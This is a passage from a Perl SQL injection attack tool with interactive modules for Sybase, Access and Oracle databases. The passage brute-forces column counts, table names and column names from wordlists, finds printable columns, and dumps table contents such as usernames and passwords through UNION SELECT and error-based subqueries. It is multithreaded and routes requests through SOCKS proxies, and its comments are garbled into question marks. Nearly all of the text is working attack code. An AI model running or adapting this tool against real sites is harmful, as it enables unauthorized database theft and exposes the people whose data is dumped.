6768.                   print FILE "DB [" . $db_name . "], table ID [" . $table_id . "], column_name: --> " . $column_name . "\n";
6769.                   print "DB [" . $db_name . "], table ID [" . $table_id . "], column_name: --> " . $column_name . "\n";
6770.               } else {
6771.                   $flag = 1;
6772.               }
6773.               print $ss . "\r";
6774.               sleep $pause;
6775.      }
6776.      print "----------\n";
6777.      print "Saved in " . "z_" . $host . ".txt\n";
6778.      close(FILE);
6779.      goto START_sb;
6780. }
6781. if ($choice == 5) {
6782.      open( FILE, ">>" . "z_" .$host . ".txt" ); # ???? ??? ?????? ???????????
6783.      print "-----------------------------------------\n";
6784.      print "Enter DB name:\n";
6785.      print "-----------------------------------------\n";
6786.      $choice = <STDIN>;
6787.      chomp $choice;
6788.      $db_name = $choice;
6789.      print "DB name: " . $db_name . "\n";
6790.      print "-----------------------------------------\n";
6791.      print "Enter Table name:\n";
6792.      print "-----------------------------------------\n";
6793.      $choice1 = <STDIN>;
6794.      chomp $choice1;
6795.      $table_name = $choice1;
6796.      print "Table name: " . $table_name . "\n";
6797.      print "----------------------------------------------------------------------------\n";
6798.      print "Enter the column(s) name(s) - for example - id or id,username,user_password:\n";
6799.      print "----------------------------------------------------------------------------\n";
6800.      $choice2 = <STDIN>;
6801.      chomp $choice2;
6802.      $column_name1 = $choice2;
6803.      $column_name = $choice2;
6804.      $f_column = $column_name1;
6805.      @column_spis = split(/,/,$column_name);
6806.      $size = @column_spis;
6807.      if ($size > 1) {
6808.        $column_name = "";
6809.        $f_column = $column_spis[0];
6810.        $a = 0;
6811.        while ($a < $size) {
6812.         if ($a == ($size-1)) {
6813.           $column_name .= "convert(varchar," . $column_spis[$a] . ")";
6814.         } else {
6815.           $column_name .= "convert(varchar," . $column_spis[$a] . ")||0x3a||";
6816.         }
6817.           $a++;
6818.        }
6819.      }
6820.      print FILE  "-----------------------------------------\n";
6821.      print FILE  "Dump column(s): [ " . $column_name1 . " ] from [ " . $db_name . ".." . $table_name . " ]\n";
6822.      print FILE  "-----------------------------------------\n";
6823.      print "----------------------------------------------------------------------------\n";
6824.      print "Dump column(s): [ " . $column_name1. " ] from [ " . $db_name . ".." . $table_name . " ]\n";
6825.      print "Request method - $method\n";
6826.      print "Threads - 1 (Sybase)\n";
6827.      print "Proxy - $proxy_message\n";
6828.      print "----------------------\n";
6829.             $| = 1;
6830.             $current_name = "";
6831.             $s = 0;
6832.             $flag = 0;
6833.             $temp = "";
6834.             $temp1 = "";
6835.             $temp2 = "";
6836.             while ($flag == 0) {
6837.                $i = $num;
6838.              if ($s_method == 1) {
6839.                if ($s == 0) {
6840.                     $current = $s_subquery_url . "convert(" . $s_convert . ",(select" . $s_plus . $s_sql_pref1 .  'max(' . $column_name . ')' . $s_sql_pref2 .  $s_plus . "from" . $s_plus . $db_name . ".." . $table_name .  "))" . $s_filtr;
6841.                } else {
6842.                     $current = $s_subquery_url . "convert(" . $s_convert . ",(select" . $s_plus . $s_sql_pref1 .  'max(' . $column_name . ')' . $s_sql_pref2 .  $s_plus . "from" . $s_plus . $db_name . ".." . $table_name . $s_plus . "where" . $s_plus . "convert(varchar," . $f_column . ")" . $s_plus . "not" . $s_plus . "in" . $s_plus . "(" . $current_name . ")))" . $s_filtr;
6843.                }
6844.              }
6845.              if ($s_method == 0) {
6846.                if ($s == 0) {
6847.                     $current = $ss_sql_start . $s_sql_pref1 .  'max(' . $column_name . ')' . $s_sql_pref2 . $ss_sql_end . $s_plus . "from" . $s_plus . $db_name . ".." . $table_name . $s_filtr;
6848.                } else {
6849.                     $current = $ss_sql_start . $s_sql_pref1 .  'max(' . $column_name . ')' . $s_sql_pref2 . $ss_sql_end . $s_plus . "from" . $s_plus . $db_name . ".." . $table_name . $s_plus . "where" . $s_plus . "convert(varchar," . $f_column . ")" . $s_plus . "not" . $s_plus . "in" . $s_plus . "(" . $current_name . ")" . $s_filtr;
6850.                }
6851.              }
6852.                $content = scan_url();
6853.                if ($content =~ m/ussr(.*?)ussr/imgs) {
6854.                    if ($size == 1) {
6855.                           if ($s == 0) {
6856.                               $temp = $1;
6857.                               $temp1 = int($temp);
6858.                               if (length($temp) == length($temp1)) {
6859.                                     $current_name = $1;
6860.                               } else {
6861.                                     $current_name = ascii_to_hex($1);
6862.                               }
6863.                           } else {
6864.                               $temp = $1;
6865.                               $temp1 = int($temp);
6866.                               if (length($temp) == length($temp1)) {
6867.                                     $current_name .= "," . $1;
6868.                               } else {
6869.                                     $current_name .= "," . ascii_to_hex($1);
6870.                               }
6871.                           $temp = "";
6872.                           $temp1 = "";
6873.                           }
6874.                    } else {
6875.                         ($temp2) = split(/:/,$1);
6876.                         if ($s == 0) {
6877.                              $temp = $temp2;
6878.                              $temp1 = int($temp);
6879.                              if (length($temp) == length($temp1)) {
6880.                                   $current_name = $temp2;
6881.                              } else {
6882.                                   $current_name = ascii_to_hex($temp2);
6883.                              }
6884.                         } else {
6885.                              $temp = $temp2;
6886.                              $temp1 = int($temp);
6887.                              if (length($temp) == length($temp1)) {
6888.                                   $current_name .= "," . $temp2;
6889.                              } else {
6890.                                   $current_name .= "," . ascii_to_hex($temp2);
6891.                              }
6892.                              $temp = "";
6893.                              $temp1 = "";
6894.                              $temp2 = "";
6895.                         }
6896.                    }
6897.                    print "   " . $1 . "\n";
6898.                    print FILE "  "  . $1 . "\n";
6899.                } else {
6900.                   $flag = 1;
6901.                }
6902.                $s++;
6903.                print $s . "\r";
6904.                sleep $pause;
6905.  
6906.             }
6907.      print "----------\n";
6908.      print "Saved in " . "z_" . $host . ".txt\n";
6909.      close(FILE);
6910.      goto START_sb;
6911. } #end Sybase
6912.  
6913. if ($choice == 6) {goto START_global}
6914. }
6915. #################################################################################################################
6916. ## Access ##
6917. if ($choice == 5) {
6918. START_a:
6919. if ($a_source_sql =~ m/^https:\/\/?([^\/]+)/i) {
6920.    $host10 = $1;
6921.    $https_flag = 1;
6922.    print "----------------------\n";
6923.    print "HTTPS mode enabled\n";
6924.    print "----------------------\n";
6925. }
6926. $host = $host10;
6927. if ($https_mode_auth == 1 && $https_auth_check == 0 && $https_flag == 1) {
6928.     print "-----------------------------------------\n";
6929.     print "Authorization required, wait please....";
6930.     my $answ1 = req($host, $https_auth_script_path, 'POST', $https_auth_post_data, 0);
6931.     $ck1 = collect($answ1);
6932.     $https_auth_check = 1;
6933.     print " DONE\n";
6934.     print "-----------------------------------------\n";
6935. }
6936. if ($use_socks == 1 && $socks_check == 0) {
6937.   $check_url = $host;
6938.   our $query = "GET / HTTP/1.$http_protocol\r\n"
6939.            . "Host: $check_host\r\n"
6940.            . "Referer: http://" . $check_url . "\r\n"
6941.            . "Accept: */*\r\n"
6942.            . "User-Agent: Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.1) Gecko/20090716 Ubuntu/9.04 (jaunty) Shiretoko/3.5.1\r\n"
6943.            . "Connection: close\r\n\r\n";
6944.    print "----------------------------------------\n";
6945.    print "You choose mode with SOCKS, try to find good in $socks_file ...\n";
6946.    print "Timeout = 5 sec:\n";
6947.    print "----------------------------------------\n";
6948.    $socks_check = 0;
6949.    $check_socks = socks_check();
6950.   ($current_proxy_host,$current_proxy_port,$socks_type) = split(/:/,$check_socks);
6951.   $proxy_message = "$current_proxy_host:$current_proxy_port, SOCKS" . $socks_type;
6952.   if ($current_proxy_host) {
6953.      $socks_check = 1;
6954.      print "Will use --> $proxy_message\n";
6955.   } else {
6956.      $socks_check = 0;
6957.      $proxy_message = "No";
6958.      print "No good SOCKS in " . $socks_file . ", change mode. Exit...\n";
6959.   }
6960. }
6961. print "----------------------------------------------------------\n";
6962. print "               Choose mode:\n";
6963. print "----------------------------------------------------------\n";
6964. print "    [1] Access Sql inj brute column number\n";
6965. print "    [2] Access Sql inj brute tables\n";
6966. print "    [3] Access Sql inj brute columns\n";
6967. print "    [4] Access Sql inj get data from columns\n";
6968. print "----------------------------------------------------------\n";
6969. print "    [5]  Main menu\n";
6970. print "----------------------------------------------------------\n";
6971. $choice = <STDIN>;
6972. chomp $choice;
6973. print "Your choice - $choice\n";
6974. if ($choice == 1) {
6975.      open( FILE1, ">>" . "z_" .$host . ".txt" ); # ???? ??? ?????? ???????????
6976.      print FILE1 "   Number of columns:\n";
6977.      print FILE1 "   -------------\n";
6978.      print "-----------------------------------------\n";
6979.      print "Access brute column number\n";
6980.      print "URL - " . $a_source_sql . $a_plus . "order" . $a_plus . "by" . "..." . $a_filtr .  "\n";
6981.      print "Error message = [" .$a_error_code_column_more."]\n";
6982.      print "Max columns = [" .$a_max_column_number."]\n";
6983.      print "-----------------------------------------\n";
6984.      print "Request method - $method\n";
6985.      print "Threads - 10\n";
6986.      print "Proxy - $proxy_message\n";
6987.      print "-----------------------------------------\n";
6988.      %aa = ();
6989.      $aa = a_column_number();
6990.      $data1 = "";
6991.      $data1 = $aa->{$_},for sort {$a <=> $b} keys %$aa;
6992.      while ( my ($key, $value) = each(%$aa) ) {
6993.         if ($data1 > $value) {$data1 = $value}
6994.      }
6995.      $column_num = $data1 - 1;
6996.      sub a_column_number {
6997.                     $i = 1;
6998.                     while($i <= $a_max_column_number) {
6999.                        $url = $a_source_sql . $a_plus . "order" . $a_plus . "by" . $a_plus . $i . $a_filtr;
7000.                        push(@columns_brute_url, $url);
7001.                        push(@columns_brute_n, $i);
7002.                        $i++;
7003.                    }
7004.                    $size = @columns_brute_n;
7005.                    $thr = 10;
7006.                    $num = -1;
7007.                    %res5 = ();
7008.                    $i = 0;
7009.                    for(0..$thr) {
7010.                       $trl[$_] = threads->create(\&gets1010);
7011.                    }
7012.                    for(0..$thr) {
7013.                       %res5 = (%res5, %{$trl[$_]->join});
7014.                    }
7015.                    sub gets1010 {
7016.                           $| = 1;
7017.                           $data5 = 0;
7018.                           $ii = 0;
7019.                           while ($num < $size) {
7020.                             { lock($num);
7021.                             $num++; }
7022.                             $ii = $num;
7023.                             if ($ii < $size) {
7024.                                 $a_current = $columns_brute_url[$num];
7025.                                 $nom = $columns_brute_n[$num];
7026.                                 $current_error = $a_error_code_column_more;
7027.                                 $data5 = a_column_check();
7028.                                 if ($data5 == 1) {
7029.                                   $hash5{$ii} = $nom;
7030.                                   return \%hash5;
7031.                                 }
7032.                             }
7033.                             print $num . "\r";
7034.                             sleep $pause;
7035.                           }
7036.                   }
7037.                   return \%res5;
7038.      }
7039.      if ($column_num == -1) {
7040.         print "Can't find number of columns\n";
7041.      } else {
7042.         print "Find column number - $column_num\n";
7043.         $union =  $a_source_sql . $a_plus . "union" . $a_plus . "select" . $a_plus;
7044.         $i = 1;
7045.         while ($i <= $column_num) {
7046.           if ($i == 1) {
7047.                     $union .= 1;
7048.           } else {
7049.                    $union .= "," . $i;
7050.           }
7051.           $i++;
7052.         }
7053.         $a_current_url = $union . $a_plus . "from" . $a_plus;
7054.         print $union . $a_plus . "from" . $a_plus . "[table]" . $a_filtr ."\n";
7055.         print FILE1 $union . $a_plus . "from" . $a_plus . "[table]" . $a_filtr ."\n";
7056.      }
7057.      print "----------\n";
7058.      print "Saved in " . "z_" . $host . ".txt\n";
7059.      close(FILE1);
7060.      goto START_a;
7061. }
7062. if ($choice == 2) {
7063.    open( FILE1, ">>" . "z_" .$host . ".txt" ); # ???? ??? ?????? ???????????
7064.        print "   Brute tables\n";
7065.        print "   -------------\n";
7066.        print FILE1 "   Brute tables\n";
7067.        print FILE1 "   -------------\n";
7068.        print "   Enter number of columns:\n";
7069.        $choice1 = <STDIN>;
7070.        chomp $choice1;
7071.        $union =  $a_source_sql . $a_plus . "union" . $a_plus . "select" . $a_plus;
7072.        $i = 1;
7073.        while ($i <= $choice1) {
7074.           if ($i == 1) {
7075.                     $union .= 1;
7076.           } else {
7077.                    $union .= "," . $i;
7078.           }
7079.           $i++;
7080.        }
7081.        $a_current_url = $union . $a_plus . "from" . $a_plus;
7082.        print $a_current_url . "[brute table]" . $a_filtr . "\n";
7083.        print "   --------------------------------------------------------------------------\n";
7084.        open(FILE, "<", $source_table_list);
7085.        $c = " ";
7086.        while(<FILE>) {
7087.          chomp;
7088.          ($a,$b)= split(/$c/,$_);
7089.          if (!$b) {push(@tables4, $_)}
7090.        }
7091.        close(FILE);
7092.        print "Add prefix for brute tables ? ( for example - tbl_ ) (1/0): ";
7093.        $choice = <STDIN>;
7094.        chomp $choice;
7095.        if ($choice == 1) {
7096.               print "Enter your prefix for brute tables: ";
7097.               $choice = <STDIN>;
7098.               chomp $choice;
7099.               $pref_brute = $choice;
7100.        } else {
7101.               $pref_brute = "";
7102.        }
7103.        $size = @tables4;
7104.        print "File: $source_table_list\n";
7105.        print "Tables: $size\n";
7106.        print "-------------\n";
7107.        print "Request method - $method\n";
7108.        print "Threads - $kol_threads\n";
7109.        print "Proxy - $proxy_message\n";
7110.        print "----------------------\n";
7111.        $thr = $kol_threads; # ???-?? ???????
7112.        $num = -1; # ?? ????????
7113.        for(0..$thr) {
7114.             $trl[$_] = threads->create(\&gets731);
7115.        }
7116.        for(0..$thr) {
7117.             $trl[$_]->join;
7118.        }
7119.        sub gets731 {
7120.             $| = 1;
7121.             while ($num<$size) {
7122.                { lock($num);
7123.                $num++; }
7124.                $current1 = $pref_brute . $tables4[$num];
7125.                $a_current = $a_current_url . $current1 . $a_filtr;
7126.                $current_error = $a_error_code_table;
7127.                $content = a_table_check();
7128.                if ($content == 1) {
7129.                     print "   ---> " . $current1 . "\n";
7130.                     print FILE1 "  "  . $current1 . "\n";
7131.                }
7132.                print $num . "\r";
7133.                sleep $pause;
7134.  
7135.             }
7136.        }
7137.        print "----------\n";
7138.        print "Saved in " . "z_" . $host . ".txt\n";
7139.        close(FILE1);
7140.        goto START_a;
7141.  
7142. }
7143. if ($choice == 3) {
7144.        open( FILE1, ">>" . "z_" .$host . ".txt" ); # ???? ??? ?????? ???????????
7145.        print "   Brute columns\n";
7146.        print "   -------------\n";
7147.        print "   Enter number of columns:\n";
7148.        $choice1 = <STDIN>;
7149.        chomp $choice1;
7150.        print FILE1 "   -------------\n";
7151.        print "   Enter table_name:\n";
7152.        $choice2 = <STDIN>;
7153.        chomp $choice2;
7154.        $table_name = $choice2;
7155.        $union =  $a_source_sql . $a_plus . "union" . $a_plus . "select" . $a_plus;
7156.        $i = 1;
7157.        while ($i <= $choice1) {
7158.           if ($i == 1) {
7159.                     $union .= $a_sql_pref1 . "StrConv(" . $i . ",1)" . $a_sql_pref2;
7160.           } else {
7161.                    $union .= "," . $a_sql_pref1 . "StrConv(" . $i . ",1)" . $a_sql_pref2;
7162.           }
7163.           $i++;
7164.        }
7165.  
7166.        $a_current_url = $union . $a_plus . "from" . $a_plus;
7167.        $current = $a_current_url . $table_name . $a_filtr;
7168.        print "Find out printable column, wait please...\n";
7169.        print "------------------------------------------\n";
7170.        $content = scan_url();
7171.        $print_column = 0;
7172.        for ($i = 1; $i <= $choice1; $i++) {
7173.            if ($content =~ m/\^$i\^/img) {
7174.                   $print_column = $i;
7175.                   print "Printable column - " . $i . "\n";
7176.                   print FILE1 "Printable column - " . $i . "\n";
7177.                   $i = $choice1;
7178.             }
7179.        }
7180.        if ($print_column == 0) {
7181.          print "Can't find printable column...";
7182.          goto START_a;
7183.        }
7184.        $union =  $a_source_sql . $a_plus . "union" . $a_plus . "select" . $a_plus;
7185.        $i = 1;
7186.        $flag = 0;
7187.        while ($i <= $choice1) {
7188.           if ($i == 1) {
7189.                     $union .= 1;
7190.           } else {
7191.                    if ($i == $print_column) {
7192.                         if ($i == 1) {
7193.                              $union .= "^";
7194.                         } else {
7195.                              $union .= ",^";
7196.                         }
7197.                    } else {
7198.                         $union .= "," . $i;
7199.                    }
7200.           }
7201.           $i++;
7202.        }
7203.        ($union_left,$union_right) = split(/\^/,$union);
7204.        print $union_left . "[brute column]" . $union_right . $a_plus . "from" . $a_plus . $table_name . $a_filtr . "\n";
7205.        print "   --------------------------------------------------------------------------\n";
7206.        print FILE1 "   Brute columns from $table_name\n";
7207.        print FILE1 $union_left . "[brute column]" . $union_right . $a_plus . "from" . $a_plus . $table_name . $a_filtr . "\n";
7208.        print FILE1 "   -------------\n";
7209.        open(FILE, "<", $source_column_list);
7210.        $c = " ";
7211.        while(<FILE>) {
7212.          chomp;
7213.          ($a,$b)= split(/$c/,$_);
7214.          if (!$b) {push(@columns4, $_)}
7215.        }
7216.        close(FILE);
7217.        print "Add prefix for brute columns ? ( for example - tbl_ ) (1/0): ";
7218.        $choice = <STDIN>;
7219.        chomp $choice;
7220.        if ($choice == 1) {
7221.               print "Enter your prefix for brute columns: ";
7222.               $choice = <STDIN>;
7223.               chomp $choice;
7224.               $pref_brute = $choice;
7225.        } else {
7226.               $pref_brute = "";
7227.        }
7228.        $size = @columns4;
7229.        print "File: $source_column_list\n";
7230.        print "Columns: $size\n";
7231.        print "-------------\n";
7232.        print "Request method - $method\n";
7233.        print "Threads - $kol_threads\n";
7234.        print "Proxy - $proxy_message\n";
7235.        print "----------------------\n";
7236.        $thr = $kol_threads; # ???-?? ???????
7237.        $num = -1; # ?? ????????
7238.        for(0..$thr) {
7239.             $trl[$_] = threads->create(\&gets732);
7240.        }
7241.        for(0..$thr) {
7242.             $trl[$_]->join;
7243.        }
7244.        sub gets732 {
7245.             $| = 1;
7246.             while ($num<$size) {
7247.                { lock($num);
7248.                $num++; }
7249.                $current1 = $pref_brute . $columns4[$num];
7250.                $a_current = $union_left . $current1 . $union_right . $a_plus . "from" . $a_plus . $table_name . $a_filtr;
7251.                $current_error = $a_error_code_column;
7252.                $content = a_table_check();
7253.                if ($content == 1) {
7254.                     print "   ---> " . $current1 . "\n";
7255.                     print FILE1 "  "  . $current1 . "\n";
7256.                }
7257.                print $num . "\r";
7258.                sleep $pause;
7259.  
7260.             }
7261.        }
7262.        print "----------\n";
7263.        print "Saved in " . "z_" . $host . ".txt\n";
7264.        close(FILE1);
7265.        goto START_a;
7266.  
7267. }
7268. if ($choice == 4) {
7269.     open( FILE, ">>" . "z_" .$host . ".txt" ); # ???? ??? ?????? ???????????
7270.     sub achar($) {
7271.          $str1=$_[0];
7272.          $aa="";$bb="";
7273.          for ($i = 0; $i<length($str1); $i++ ) {
7274.              $aa =  ord(substr($str1,$i,1));
7275.              if ( $i == 0 ) {$bb= "chr(" . $aa . ")";} else { $bb= $bb. "%2bchr(" . $aa . ")" ;}
7276.          }
7277.          return "$bb";
7278.     }
7279.     print "   Enter number of columns:\n";
7280.        $choice1 = <STDIN>;
7281.        chomp $choice1;
7282.        print FILE1 "   -------------\n";
7283.        print "   Enter table_name:\n";
7284.        $choice2 = <STDIN>;
7285.        chomp $choice2;
7286.        $table_name = $choice2;
7287.        $union =  $a_source_sql . $a_plus . "union" . $a_plus . "select" . $a_plus;
7288.        $i = 1;
7289.        while ($i <= $choice1) {
7290.           if ($i == 1) {
7291.                     $union .= $a_sql_pref1 . "StrConv(" . $i . ",1)" . $a_sql_pref2;
7292.           } else {
7293.                    $union .= "," . $a_sql_pref1 . "StrConv(" . $i . ",1)" . $a_sql_pref2;
7294.           }
7295.           $i++;
7296.        }
7297.  
7298.        $a_current_url = $union . $a_plus . "from" . $a_plus;
7299.        $current = $a_current_url . $table_name . $a_filtr;
7300.        print "Find out printable column, wait please...\n";
7301.        print "------------------------------------------\n";
7302.        $content = scan_url();
7303.        $print_column = 0;
7304.        for ($i = 1; $i <= $choice1; $i++) {
7305.            if ($content =~ m/\^$i\^/img) {
7306.                   $print_column = $i;
7307.                   print "Printable column - " . $i . "\n";
7308.                   print FILE1 "Printable column - " . $i . "\n";
7309.                   $i = $choice1;
7310.             }
7311.        }
7312.        if ($print_column == 0) {
7313.          print "Can't find printable column...";
7314.          close(FILE);
7315.          goto START_a;
7316.        }
7317.        $union =  $a_source_sql . $a_plus . "union" . $a_plus . "select" . $a_plus . "top" . $a_plus . "1" . $a_plus;
7318.        $i = 1;
7319.        $flag = 0;
7320.        while ($i <= $choice1) {
7321.           if ($i == 1) {
7322.                     $union .= 1;
7323.           } else {
7324.                    if ($i == $print_column) {
7325.                         if ($i == 1) {
7326.                              $union .= "^";
7327.                         } else {
7328.                              $union .= ",^";
7329.                         }
7330.                    } else {
7331.                         $union .= "," . $i;
7332.                    }
7333.           }
7334.           $i++;
7335.        }
7336.     ($union_left,$union_right) = split(/\^/,$union);
7337.     print $union_left . "[data]" . $union_right . $a_plus . "from" . $a_plus . $table_name . $a_filtr . "\n";
7338.     print "   --------------------------------------------------------------------------\n";
7339.     print "Enter the column(s) name(s) - for example - id or id,username,user_password:\n";
7340.     $choice = <STDIN>;
7341.     print "Detect column(s) type, wait please....";
7342.     chomp $choice;
7343.     $column_name1 = $choice;
7344.     @column_spis = split(/,/,$column_name1);
7345.     $size = @column_spis;
7346.     if ($size == 1) {
7347.           $f_column = $column_name1;
7348.           $current = $union_left .  $a_sql_pref1 . $column_name1 . $a_sql_pref2 . $union_right . $a_plus . "from" . $a_plus . $table_name . $a_filtr;
7349.           $content = scan_url();
7350.           if ($content =~ m/Data type mismatch/imgs) {
7351.              $column_name = "StrConv(" . $column_name1 . ",1)";
7352.           } else {
7353.              $column_name = $column_name1;
7354.           }
7355.     }
7356.     if ($size > 1) {
7357.        $column_name = "";
7358.        $f_column = $column_spis[0];
7359.        $a = 0;
7360.        while ($a < $size) {
7361.         if ($a == ($size-1)) {
7362.           $current = $union_left . $a_sql_pref1 . $column_spis[$a] .  $a_sql_pref2 . $union_right . $a_plus . "from" . $a_plus . $table_name . $a_filtr;
7363.           $content = scan_url();
7364.           if ($content =~ m/Data type mismatch/imgs) {
7365.              $column_name .= "StrConv(" . $column_spis[$a] . ",1)";
7366.           } else {
7367.              $column_name .= $column_spis[$a];
7368.           }
7369.         } else {
7370.           $current = $union_left .  $a_sql_pref1 . $column_spis[$a] . $a_sql_pref2 . $union_right . $a_plus . "from" . $a_plus . $table_name . $a_filtr;
7371.           $content = scan_url();
7372.           if ($content =~ m/Data type mismatch/imgs) {
7373.              $column_name .= "StrConv(" . $column_spis[$a] . ",1)%2Bchr(58)%2B";;
7374.           } else {
7375.              $column_name .= $column_spis[$a] . "%2Bchr(58)%2B";
7376.           }
7377.         }
7378.         $a++;
7379.        }
7380.     }
7381.     print "DONE\n";
7382.     print FILE  "-----------------------------------------\n";
7383.     print FILE  "Dump column(s): [ " . $column_name1 . " ] from [ " . $table_name . " ]\n";
7384.     print FILE  "-----------------------------------------\n";
7385.     print "Dump column(s): [ " . $column_name1 . " ] from [ " .$table_name . " ]\n";
7386.     print "-----------------------------------------\n";
7387.     ## ?????? ???-?? ???????? ?? ??????? #
7388.     print "Count data from [ $table_name  ]\n";
7389.     $current = $union_left . "chr(94)%2bStrConv(count(*),1)%2bchr(94)" . $union_right . $a_plus . "from" . $a_plus . $table_name . $a_filtr;
7390.     $content = scan_url();
7391.     $column_name_p1 = $content;
7392.     $column_name_p1 =~ m/\^(.*)\^/imgs;
7393.     $column_name_p = $1;
7394.     print "$column_name_p\n";
7395.     print "----------\n";
7396.     print "Get ALL data from " . $table_name . " (" . $column_name_p . ") ? (1/0): ";
7397.     $choice = <STDIN>;
7398.     chomp $choice;
7399.     $thr = $kol_threads; # ???-?? ???????
7400.     if ($choice == 1) {
7401.           $num = 0; # ?? ????????
7402.     } else {
7403.           print "Enter START_position: ";
7404.           $choice1 = <STDIN>;
7405.           chomp $choice1;
7406.           $num = $choice1-1;
7407.           print "Enter END_position: ";
7408.           $choice2 = <STDIN>;
7409.           chomp $choice2;
7410.           $column_name_p = $choice2-1;
7411.           print "Dump records from [" . ($num+1) . "] to [" . ($column_name_p+1) . "]\n";
7412.     }
7413.     print "-----------------------------------------\n";
7414.     print "Request method - $method\n";
7415.     print "Threads - $kol_threads\n";
7416.     print "Proxy - $proxy_message\n";
7417.     print "----------------------\n";
7418.     ## ?????? ?????? ?? ??????? ##
7419.             $| = 1;
7420.             $current_name = "";
7421.             $s = 0;
7422.             $flag = 0;
7423.             $temp = "";
7424.             $temp1 = "";
7425.             $temp2 = "";
7426.             while ($flag == 0) {
7427.                $i = $num;
7428.                if ($s == 0) {
7429.                     $current = $union_left . $a_sql_pref1 . $column_name . $a_sql_pref2 . $union_right . $a_plus . "from" . $a_plus . $table_name . $a_filtr;
7430.                } else {
7431.                     $current = $union_left . $a_sql_pref1 . $column_name  . $a_sql_pref2 . $union_right . $a_plus . "from" . $a_plus . $table_name . $a_plus . "where" . $a_plus . $f_column . $a_plus . "not" . $a_plus . "in" . $a_plus . "(" . $current_name . ")" .  $a_filtr;
7432.                }
7433.                $content = scan_url();
7434.                if ($content =~ m/\^(.*)\^/imgs) {
7435.                    if ($size == 1) {
7436.                           if ($s == 0) {
7437.                               $temp = $1;
7438.                               $temp1 = int($temp);
7439.                               if (length($temp) == length($temp1)) {
7440.                                     $current_name = $1;
7441.                               } else {
7442.                                     $current_name = achar($1);
7443.                               }
7444.                           } else {
7445.                               $temp = $1;
7446.                               $temp1 = int($temp);
7447.                               if (length($temp) == length($temp1)) {
7448.                                     $current_name .= "," . $1;
7449.                               } else {
7450.                                     $current_name .= "," . achar($1);
7451.                               }
7452.                           $temp = "";
7453.                           $temp1 = "";
7454.                           }
7455.                    } else {
7456.                         ($temp2) = split(/:/,$1);
7457.                         if ($s == 0) {
7458.                              $temp = $temp2;
7459.                              $temp1 = int($temp);
7460.                              if (length($temp) == length($temp1)) {
7461.                                   $current_name = $temp2;
7462.                              } else {
7463.                                   $current_name = achar($temp2);
7464.                              }
7465.                         } else {
7466.                              $temp = $temp2;
7467.                              $temp1 = int($temp);
7468.                              if (length($temp) == length($temp1)) {
7469.                                   $current_name .= "," . $temp2;
7470.                              } else {
7471.                                   $current_name .= "," . achar($temp2);
7472.                              }
7473.                              $temp = "";
7474.                              $temp1 = "";
7475.                              $temp2 = "";
7476.                         }
7477.                    }
7478.                    print "   " . $1 . "\n";
7479.                    print FILE "  "  . $1 . "\n";
7480.                } else {
7481.                   $flag = 1;
7482.                }
7483.                $s++;
7484.                print $s . "\r";
7485.                sleep $pause;
7486.  
7487.             }
7488.     #}
7489.     print "----------\n";
7490.     print "Saved in " . "z_" . $host . ".txt\n";
7491.     close(FILE);
7492.     goto goto START_a;
7493.  
7494. }
7495. if ($choice == 5) {goto START_global}
7496. }
7497. ####################################################################################################################
7498. ## Oracle sql inj ##
7499. if ($choice == 6) {
7500. START_o:
7501. if ($o_source_sql =~ m/^https:\/\/?([^\/]+)/i) {
7502.    $host11 = $1;
7503.    $https_flag = 1;
7504.    print "----------------------\n";
7505.    print "HTTPS mode enabled\n";
7506.    print "----------------------\n";
7507. }
7508. $host = $host11;
7509. if ($https_mode_auth == 1 && $https_auth_check == 0 && $https_flag == 1) {
7510.     print "-----------------------------------------\n";
7511.     print "Authorization required, wait please....";
7512.     my $answ1 = req($host, $https_auth_script_path, 'POST', $https_auth_post_data, 0);
7513.     $ck1 = collect($answ1);
7514.     $https_auth_check = 1;
7515.     print " DONE\n";
7516.     print "-----------------------------------------\n";
7517. }
7518. if ($use_socks == 1 && $socks_check == 0) {
7519.   $check_url = $host;
7520.   our $query = "GET / HTTP/1.$http_protocol\r\n"
7521.            . "Host: $check_host\r\n"
7522.            . "Referer: http://" . $check_url . "\r\n"
7523.            . "Accept: */*\r\n"
7524.            . "User-Agent: Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.1) Gecko/20090716 Ubuntu/9.04 (jaunty) Shiretoko/3.5.1\r\n"
7525.            . "Connection: close\r\n\r\n";
7526.    print "----------------------------------------\n";
7527.    print "You choose mode with SOCKS, try to find good in $socks_file ...\n";
7528.    print "Timeout = 5 sec:\n";
7529.    print "----------------------------------------\n";
7530.    $socks_check = 0;
7531.    $check_socks = socks_check();
7532.   ($current_proxy_host,$current_proxy_port,$socks_type) = split(/:/,$check_socks);
7533.   $proxy_message = "$current_proxy_host:$current_proxy_port, SOCKS" . $socks_type;
7534.   if ($current_proxy_host) {
7535.      $socks_check = 1;
7536.      print "Will use --> $proxy_message\n";
7537.   } else {
7538.      $socks_check = 0;
7539.      $proxy_message = "No";
7540.      print "No good SOCKS in " . $socks_file . ", change mode. Exit...\n";
7541.   }
7542. }
7543. sub char_p($) {
7544.          $str1=$_[0];
7545.          $aa="";$bb="";
7546.          for ($i = 0; $i<length($str1); $i++ ) {
7547.              $aa =  ord(substr($str1,$i,1));
7548.              if ( $i == 0 ) {$bb= "chr(" . $aa . ")";} else { $bb= $bb. "||chr(" . $aa . ")" ;}
7549.          }
7550.          return "$bb";
7551. }
7552. print "----------------------------------------------------------\n";
7553. print "               Choose mode:\n";
7554. print "----------------------------------------------------------\n";
7555. print "    [1] Oracle SQL inj system information\n";
7556. print "    [2] Oracle SQL inj get tables from sys.user_tables\n";
7557. print "    [3] Oracle SQL inj get column_name from table\n";
7558. print "    [4] Oracle SQL inj get data from columns\n";
7559. print "    =======================================================\n";
7560. print "    [5] Main menu\n";
7561. print "----------------------------------------------------------\n";
7562. $choice = <STDIN>;
7563. chomp $choice;
7564. print "Your choice: $choice\n";
7565. if ($choice == 1) {
7566.      open( FILE, ">>" . "z_" . $host . ".txt" ); # ???? ??? ?????? ???????????
7567.      $url1 = $o_sql_start . $o_sql_pref1 .  "to_" . $o_convert . "(BANNER)" .$o_sql_pref2 . $o_sql_end . $o_plus . "FROM" . $o_plus . 'V$VERSION' . $o_filtr;
7568.      $url2 = $o_sql_start . $o_sql_pref1 .  "to_" . $o_convert . "(USER)" .$o_sql_pref2 . $o_sql_end . $o_plus . "FROM" . $o_plus . 'sys.dual' . $o_filtr;
7569.      @array = ($url1,$url2);
7570.      $size = @array; #???????? ?????? ???????
7571.      $thr = $kol_threads; # ???-?? ???????
7572.      $num = -1; # ?? ????????
7573.      print "-----------------------------------------\n";
7574.      print "System information:\n";
7575.      print "-----------------------------------------\n";
